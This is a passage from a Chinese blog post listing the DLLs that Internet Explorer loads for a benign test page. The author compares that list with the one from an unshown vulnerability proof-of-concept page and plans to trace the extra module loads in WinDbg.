Corporation C:\Windows\SysWOW64\netutils.dll ninput.dll Microsoft Pen and Touch Input Component Microsoft Corporation C:\Windows\SysWOW64\ninput.dll nsi.dll NSI User-mode interface DLL Microsoft Corporation C:\Windows\SysWOW64\nsi.dll ntdll.dll NT 层 DLL Microsoft Corporation C:\Windows\SysWOW64\ntdll.dll ntdll.dll NT 层 DLL Microsoft Corporation C:\Windows\System32\ntdll.dll ntmarta.dll Windows NT MARTA provider Microsoft Corporation C:\Windows\SysWOW64\ntmarta.dll ole32.dll Microsoft OLE for Windows Microsoft Corporation C:\Windows\SysWOW64\ole32.dll oleaut32.dll OLEAUT32.DLL Microsoft Corporation C:\Windows\SysWOW64\oleaut32.dll OnDemandConnRouteHelper.dll On Demand Connctiond Route Helper Microsoft Corporation C:\Windows\SysWOW64\OnDemandConnRouteHelper.dll OneCoreCommonProxyStub.dll OneCore Common Proxy Stub Microsoft Corporation C:\Windows\SysWOW64\OneCoreCommonProxyStub.dll OneCoreUAPCommonProxyStub.dll OneCoreUAP Common Proxy Stub Microsoft Corporation C:\Windows\SysWOW64\OneCoreUAPCommonProxyStub.dll powrprof.dll Power Profile Helper DLL Microsoft Corporation C:\Windows\SysWOW64\powrprof.dll profapi.dll User Profile Basic API Microsoft 
Corporation C:\Windows\SysWOW64\profapi.dll propsys.dll Microsoft 属性系统 Microsoft Corporation C:\Windows\SysWOW64\propsys.dll propsys.dll.mui Microsoft 属性系统 Microsoft Corporation C:\Windows\System32\zh-CN\propsys.dll.mui R000000000006.clb C:\Windows\Registration\R000000000006.clb rmclient.dll Resource Manager Client Microsoft Corporation C:\Windows\SysWOW64\rmclient.dll rpcrt4.dll 远程过程调用运行时 Microsoft Corporation C:\Windows\SysWOW64\rpcrt4.dll scrrun.dll Microsoft ® Script Runtime Microsoft Corporation C:\Windows\SysWOW64\scrrun.dll scrrun.dll Microsoft ® Script Runtime Microsoft Corporation C:\Windows\SysWOW64\scrrun.dll sechost.dll Host for SCM/SDDL/LSA Lookup APIs Microsoft Corporation C:\Windows\SysWOW64\sechost.dll secur32.dll Security Support Provider Interface Microsoft Corporation C:\Windows\SysWOW64\secur32.dll SHCore.dll SHCORE Microsoft Corporation C:\Windows\SysWOW64\SHCore.dll shell32.dll Windows Shell Common Dll Microsoft Corporation C:\Windows\SysWOW64\shell32.dll shlwapi.dll 外壳简易实用工具库 Microsoft Corporation C:\Windows\SysWOW64\shlwapi.dll SortDefault.nls C:\Windows\Globalization\Sorting\SortDefault.nls srpapi.dll SRP APIs Dll Microsoft Corporation C:\Windows\SysWOW64\srpapi.dll sspicli.dll Security Support Provider Interface Microsoft Corporation C:\Windows\SysWOW64\sspicli.dll StaticCache.dat C:\Windows\Fonts\StaticCache.dat SuggestedSites.dat C:\Users\bonelee\AppData\Local\Microsoft\Windows\INetCache\Low\SuggestedSites.dat sxs.dll Fusion 2.5 Microsoft Corporation C:\Windows\SysWOW64\sxs.dll TextInputFramework.dll "TextInputFramework.DYNLINK" Microsoft Corporation C:\Windows\SysWOW64\TextInputFramework.dll tokenbinding.dll Token Binding Protocol Microsoft Corporation C:\Windows\SysWOW64\tokenbinding.dll twinapi.appcore.dll twinapi.appcore Microsoft Corporation C:\Windows\SysWOW64\twinapi.appcore.dll ucrtbase.dll Microsoft® C Runtime Library Microsoft Corporation C:\Windows\SysWOW64\ucrtbase.dll urlmon.dll Win32 的 OLE32 扩展 Microsoft Corporation 
C:\Windows\SysWOW64\urlmon.dll urlmon.dll.mui Win32 的 OLE32 扩展 Microsoft Corporation C:\Windows\System32\zh-CN\urlmon.dll.mui user32.dll 多用户 Windows 用户 API 客户端 DLL Microsoft Corporation C:\Windows\SysWOW64\user32.dll uxtheme.dll Microsoft UxTheme Library Microsoft Corporation C:\Windows\SysWOW64\uxtheme.dll vaultcli.dll Credential Vault Client Library Microsoft Corporation C:\Windows\SysWOW64\vaultcli.dll version.dll Version Checking and File Installation Libraries Microsoft Corporation C:\Windows\SysWOW64\version.dll vm3dum_10.dll VMware SVGA 3D D3D10 Client Driver VMware, Inc. C:\Windows\SysWOW64\vm3dum_10.dll vm3dum_loader.dll VMware SVGA 3D Usermode Driver Loader VMware, Inc. C:\Windows\SysWOW64\vm3dum_loader.dll win32u.dll Win32u Microsoft Corporation C:\Windows\SysWOW64\win32u.dll windows.storage.dll Microsoft WinRT Storage API Microsoft Corporation C:\Windows\SysWOW64\windows.storage.dll winhttp.dll Windows HTTP Services Microsoft Corporation C:\Windows\SysWOW64\winhttp.dll wininet.dll Internet Extensions for Win32 Microsoft Corporation C:\Windows\SysWOW64\wininet.dll winmm.dll MCI API DLL Microsoft Corporation C:\Windows\SysWOW64\winmm.dll winmmbase.dll Base Multimedia Extension API DLL Microsoft Corporation C:\Windows\SysWOW64\winmmbase.dll winnsi.dll Network Store Information RPC interface Microsoft Corporation C:\Windows\SysWOW64\winnsi.dll wintrust.dll Microsoft Trust Verification APIs Microsoft Corporation C:\Windows\SysWOW64\wintrust.dll WinTypes.dll Windows Base Types DLL Microsoft Corporation C:\Windows\SysWOW64\WinTypes.dll wkscli.dll Workstation Service Client DLL Microsoft Corporation C:\Windows\SysWOW64\wkscli.dll wldp.dll Windows Lockdown Policy Microsoft Corporation C:\Windows\SysWOW64\wldp.dll wow64.dll Win32 Emulation on NT64 Microsoft Corporation C:\Windows\System32\wow64.dll wow64cpu.dll AMD64 Wow64 CPU Microsoft Corporation C:\Windows\System32\wow64cpu.dll wow64win.dll Wow64 Console and Win32 API Logging Microsoft Corporation 
C:\Windows\System32\wow64win.dll ws2_32.dll Windows Socket 2.0 32-Bit DLL Microsoft Corporation C:\Windows\SysWOW64\ws2_32.dll
太多了,看不出问题在哪里!我单独创建一个正常的 html 文件,然后用 ie 加载,文件内容如下:
<html> start! <script> alert("hi"); </script> </html>
运行后,
加载的dll如下:
Process: iexplore.exe Pid: 4808 Name Description Company Name Path {6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db {AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000001.db C:\Users\bonelee\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000001.db {DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db ~FontCache-FontFace.dat C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\~FontCache-FontFace.dat ~FontCache-S-1-5-21-2730912745-1723166478-227975165-1000.dat C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\~FontCache-S-1-5-21-2730912745-1723166478-227975165-1000.dat ~FontCache-System.dat C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\~FontCache-System.dat advapi32.dll Advanced Windows 32 Base API Microsoft Corporation C:\Windows\SysWOW64\advapi32.dll apphelp.dll 应用程序兼容性客户端库 Microsoft Corporation C:\Windows\SysWOW64\apphelp.dll bcrypt.dll Windows Cryptographic Primitives Library (Wow64) Microsoft Corporation C:\Windows\SysWOW64\bcrypt.dll bcryptprimitives.dll Windows Cryptographic Primitives Library Microsoft Corporation C:\Windows\SysWOW64\bcryptprimitives.dll C_1252.NLS C:\Windows\System32\C_1252.NLS cfgmgr32.dll Configuration Manager DLL Microsoft Corporation C:\Windows\SysWOW64\cfgmgr32.dll clbcatq.dll COM+ Configuration Catalog Microsoft Corporation C:\Windows\SysWOW64\clbcatq.dll combase.dll Microsoft COM for Windows Microsoft Corporation C:\Windows\SysWOW64\combase.dll comctl32.dll 用户体验控件库 Microsoft Corporation C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17763.737_none_588eeadb78ace734\comctl32.dll comctl32.dll 用户体验控件库 Microsoft Corporation 
C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.737_none_4d637a531b9a7e51\comctl32.dll comdlg32.dll Common Dialogs DLL Microsoft Corporation C:\Windows\SysWOW64\comdlg32.dll CoreMessaging.dll Microsoft CoreMessaging Dll Microsoft Corporation C:\Windows\SysWOW64\CoreMessaging.dll CoreUIComponents.dll Microsoft Core UI Components Dll Microsoft Corporation C:\Windows\SysWOW64\CoreUIComponents.dll crypt32.dll Crypto API32 Microsoft Corporation C:\Windows\SysWOW64\crypt32.dll cryptbase.dll Base cryptographic API DLL Microsoft Corporation C:\Windows\SysWOW64\cryptbase.dll cryptsp.dll Cryptographic Service Provider API Microsoft Corporation C:\Windows\SysWOW64\cryptsp.dll cversions.2.db C:\ProgramData\Microsoft\Windows\Caches\cversions.2.db cversions.2.db C:\ProgramData\Microsoft\Windows\Caches\cversions.2.db d2d1.dll Microsoft D2D Library Microsoft Corporation C:\Windows\SysWOW64\d2d1.dll d3d11.dll Direct3D 11 Runtime Microsoft Corporation C:\Windows\SysWOW64\d3d11.dll DataExchange.dll Data exchange Microsoft Corporation C:\Windows\SysWOW64\DataExchange.dll dcomp.dll Microsoft DirectComposition Library Microsoft Corporation C:\Windows\SysWOW64\dcomp.dll directmanipulation.dll Microsoft Direct Manipulation Component Microsoft Corporation C:\Windows\SysWOW64\directmanipulation.dll dwmapi.dll Microsoft Desktop Window Manager API Microsoft Corporation C:\Windows\SysWOW64\dwmapi.dll DWrite.dll Microsoft DirectX Typography Services Microsoft Corporation C:\Windows\SysWOW64\DWrite.dll dxgi.dll DirectX Graphics Infrastructure Microsoft Corporation C:\Windows\SysWOW64\dxgi.dll efswrt.dll Storage Protection Windows Runtime DLL Microsoft Corporation C:\Windows\SysWOW64\efswrt.dll gdi32.dll GDI Client DLL Microsoft Corporation C:\Windows\SysWOW64\gdi32.dll gdi32full.dll GDI Client DLL Microsoft Corporation C:\Windows\SysWOW64\gdi32full.dll ieapfltr.dll Microsoft SmartScreen Filter Microsoft Corporation C:\Windows\SysWOW64\ieapfltr.dll ieframe.dll 
Internet 浏览器 Microsoft Corporation C:\Windows\SysWOW64\ieframe.dll ieframe.dll.mui Internet 浏览器 Microsoft Corporation C:\Windows\System32\zh-CN\ieframe.dll.mui ieproxy.dll IE ActiveX Interface Marshaling Library Microsoft Corporation C:\Windows\SysWOW64\ieproxy.dll iertutil.dll Internet Explorer 的运行时实用程序 Microsoft Corporation C:\Windows\SysWOW64\iertutil.dll IEShims.dll Internet Explorer Compatibility Shims Microsoft Corporation C:\Program Files (x86)\Internet Explorer\IEShims.dll ieui.dll Internet Explorer UI 引擎 Microsoft Corporation C:\Windows\SysWOW64\ieui.dll iexplore.exe Internet Explorer Microsoft Corporation C:\Program Files (x86)\Internet Explorer\iexplore.exe iexplore.exe.mui Internet Explorer Microsoft Corporation C:\Program Files\internet explorer\zh-CN\iexplore.exe.mui imageres.dll Windows Image Resource Microsoft Corporation C:\Windows\SysWOW64\imageres.dll imageres.dll.mui Windows Image Resource Microsoft Corporation C:\Windows\System32\en-US\imageres.dll.mui imm32.dll Multi-User Windows IMM32 API Client DLL Microsoft Corporation C:\Windows\SysWOW64\imm32.dll IPHLPAPI.DLL IP Helper API Microsoft Corporation C:\Windows\SysWOW64\IPHLPAPI.DLL jscript9.dll Microsoft (R) JScript Microsoft Corporation C:\Windows\SysWOW64\jscript9.dll kernel.appcore.dll AppModel API Host Microsoft Corporation C:\Windows\SysWOW64\kernel.appcore.dll kernel32.dll Windows NT BASE API Client DLL Microsoft Corporation C:\Windows\SysWOW64\kernel32.dll KernelBase.dll Windows NT BASE API Client DLL Microsoft Corporation C:\Windows\SysWOW64\KernelBase.dll locale.nls C:\Windows\System32\locale.nls mlang.dll Multi Language Support DLL Microsoft Corporation C:\Windows\SysWOW64\mlang.dll mlang.dll.mui 多语言支持 DLL Microsoft Corporation C:\Windows\System32\zh-CN\mlang.dll.mui mpr.dll Multiple Provider Router DLL Microsoft Corporation C:\Windows\SysWOW64\mpr.dll msasn1.dll ASN.1 Runtime APIs Microsoft Corporation C:\Windows\SysWOW64\msasn1.dll msctf.dll MSCTF Server DLL Microsoft Corporation 
C:\Windows\SysWOW64\msctf.dll mshtml.dll Microsoft (R) HTML 查看器 Microsoft Corporation C:\Windows\SysWOW64\mshtml.dll mshtml.dll.mui Microsoft (R) HTML 查看器 Microsoft Corporation C:\Windows\System32\zh-CN\mshtml.dll.mui msimtf.dll Active IMM Server DLL Microsoft Corporation C:\Windows\SysWOW64\msimtf.dll msIso.dll Isolation Library for Internet Explorer Microsoft Corporation C:\Windows\SysWOW64\msIso.dll msvcp_win.dll Microsoft® C Runtime Library Microsoft Corporation C:\Windows\SysWOW64\msvcp_win.dll msvcrt.dll Windows NT CRT DLL Microsoft Corporation C:\Windows\SysWOW64\msvcrt.dll mswsock.dll Microsoft Windows Sockets 2.0 Service Provider Microsoft Corporation C:\Windows\SysWOW64\mswsock.dll netapi32.dll Net Win32 API DLL Microsoft Corporation C:\Windows\SysWOW64\netapi32.dll netutils.dll Net Win32 API Helpers DLL Microsoft Corporation C:\Windows\SysWOW64\netutils.dll ninput.dll Microsoft Pen and Touch Input Component Microsoft Corporation C:\Windows\SysWOW64\ninput.dll nsi.dll NSI User-mode interface DLL Microsoft Corporation C:\Windows\SysWOW64\nsi.dll ntdll.dll NT 层 DLL Microsoft Corporation C:\Windows\SysWOW64\ntdll.dll ntdll.dll NT 层 DLL Microsoft Corporation C:\Windows\System32\ntdll.dll ntmarta.dll Windows NT MARTA provider Microsoft Corporation C:\Windows\SysWOW64\ntmarta.dll ole32.dll Microsoft OLE for Windows Microsoft Corporation C:\Windows\SysWOW64\ole32.dll oleaut32.dll OLEAUT32.DLL Microsoft Corporation C:\Windows\SysWOW64\oleaut32.dll OnDemandConnRouteHelper.dll On Demand Connctiond Route Helper Microsoft Corporation C:\Windows\SysWOW64\OnDemandConnRouteHelper.dll OneCoreCommonProxyStub.dll OneCore Common Proxy Stub Microsoft Corporation C:\Windows\SysWOW64\OneCoreCommonProxyStub.dll OneCoreUAPCommonProxyStub.dll OneCoreUAP Common Proxy Stub Microsoft Corporation C:\Windows\SysWOW64\OneCoreUAPCommonProxyStub.dll powrprof.dll Power Profile Helper DLL Microsoft Corporation C:\Windows\SysWOW64\powrprof.dll profapi.dll User Profile Basic API Microsoft 
Corporation C:\Windows\SysWOW64\profapi.dll propsys.dll Microsoft 属性系统 Microsoft Corporation C:\Windows\SysWOW64\propsys.dll propsys.dll.mui Microsoft 属性系统 Microsoft Corporation C:\Windows\System32\zh-CN\propsys.dll.mui R000000000006.clb C:\Windows\Registration\R000000000006.clb rmclient.dll Resource Manager Client Microsoft Corporation C:\Windows\SysWOW64\rmclient.dll rpcrt4.dll 远程过程调用运行时 Microsoft Corporation C:\Windows\SysWOW64\rpcrt4.dll sechost.dll Host for SCM/SDDL/LSA Lookup APIs Microsoft Corporation C:\Windows\SysWOW64\sechost.dll secur32.dll Security Support Provider Interface Microsoft Corporation C:\Windows\SysWOW64\secur32.dll SHCore.dll SHCORE Microsoft Corporation C:\Windows\SysWOW64\SHCore.dll shell32.dll Windows Shell Common Dll Microsoft Corporation C:\Windows\SysWOW64\shell32.dll shlwapi.dll 外壳简易实用工具库 Microsoft Corporation C:\Windows\SysWOW64\shlwapi.dll simsun.ttc C:\Windows\Fonts\simsun.ttc SortDefault.nls C:\Windows\Globalization\Sorting\SortDefault.nls srpapi.dll SRP APIs Dll Microsoft Corporation C:\Windows\SysWOW64\srpapi.dll sspicli.dll Security Support Provider Interface Microsoft Corporation C:\Windows\SysWOW64\sspicli.dll StaticCache.dat C:\Windows\Fonts\StaticCache.dat SuggestedSites.dat C:\Users\bonelee\AppData\Local\Microsoft\Windows\INetCache\Low\SuggestedSites.dat TextInputFramework.dll "TextInputFramework.DYNLINK" Microsoft Corporation C:\Windows\SysWOW64\TextInputFramework.dll tokenbinding.dll Token Binding Protocol Microsoft Corporation C:\Windows\SysWOW64\tokenbinding.dll twinapi.appcore.dll twinapi.appcore Microsoft Corporation C:\Windows\SysWOW64\twinapi.appcore.dll ucrtbase.dll Microsoft® C Runtime Library Microsoft Corporation C:\Windows\SysWOW64\ucrtbase.dll urlmon.dll Win32 的 OLE32 扩展 Microsoft Corporation C:\Windows\SysWOW64\urlmon.dll urlmon.dll.mui Win32 的 OLE32 扩展 Microsoft Corporation C:\Windows\System32\zh-CN\urlmon.dll.mui user32.dll 多用户 Windows 用户 API 客户端 DLL Microsoft Corporation C:\Windows\SysWOW64\user32.dll 
uxtheme.dll Microsoft UxTheme Library Microsoft Corporation C:\Windows\SysWOW64\uxtheme.dll vaultcli.dll Credential Vault Client Library Microsoft Corporation C:\Windows\SysWOW64\vaultcli.dll version.dll Version Checking and File Installation Libraries Microsoft Corporation C:\Windows\SysWOW64\version.dll vm3dum_10.dll VMware SVGA 3D D3D10 Client Driver VMware, Inc. C:\Windows\SysWOW64\vm3dum_10.dll vm3dum_loader.dll VMware SVGA 3D Usermode Driver Loader VMware, Inc. C:\Windows\SysWOW64\vm3dum_loader.dll win32u.dll Win32u Microsoft Corporation C:\Windows\SysWOW64\win32u.dll windows.storage.dll Microsoft WinRT Storage API Microsoft Corporation C:\Windows\SysWOW64\windows.storage.dll winhttp.dll Windows HTTP Services Microsoft Corporation C:\Windows\SysWOW64\winhttp.dll wininet.dll Internet Extensions for Win32 Microsoft Corporation C:\Windows\SysWOW64\wininet.dll winmm.dll MCI API DLL Microsoft Corporation C:\Windows\SysWOW64\winmm.dll winmmbase.dll Base Multimedia Extension API DLL Microsoft Corporation C:\Windows\SysWOW64\winmmbase.dll winnsi.dll Network Store Information RPC interface Microsoft Corporation C:\Windows\SysWOW64\winnsi.dll wintrust.dll Microsoft Trust Verification APIs Microsoft Corporation C:\Windows\SysWOW64\wintrust.dll WinTypes.dll Windows Base Types DLL Microsoft Corporation C:\Windows\SysWOW64\WinTypes.dll wkscli.dll Workstation Service Client DLL Microsoft Corporation C:\Windows\SysWOW64\wkscli.dll wldp.dll Windows Lockdown Policy Microsoft Corporation C:\Windows\SysWOW64\wldp.dll wow64.dll Win32 Emulation on NT64 Microsoft Corporation C:\Windows\System32\wow64.dll wow64cpu.dll AMD64 Wow64 CPU Microsoft Corporation C:\Windows\System32\wow64cpu.dll wow64win.dll Wow64 Console and Win32 API Logging Microsoft Corporation C:\Windows\System32\wow64win.dll ws2_32.dll Windows Socket 2.0 32-Bit DLL Microsoft Corporation C:\Windows\SysWOW64\ws2_32.dll
我们使用 diff 工具比较两份模块清单的差异：左边是 hello world 正常网页，右边是加载了上述漏洞 PoC 页面后的 DLL 清单。（对比截图未在正文中给出，正文只贴了一份清单，也没有说明它属于哪一边；自己复现时请分别导出两份清单再比对。）
好了，可以看到 PoC 页面多加载了几个核心 DLL！具体多出来的是哪几个，正文没有逐个列出，以对比截图为准。
明天分析下加载这几个 DLL 的原因。（一个可行的验证方法：在 WinDbg 里用 sxe ld:<模块名> 让进程在该模块加载时中断，从调用栈确认是 PoC 的哪一步触发了加载，而不是仅凭清单差异推测。）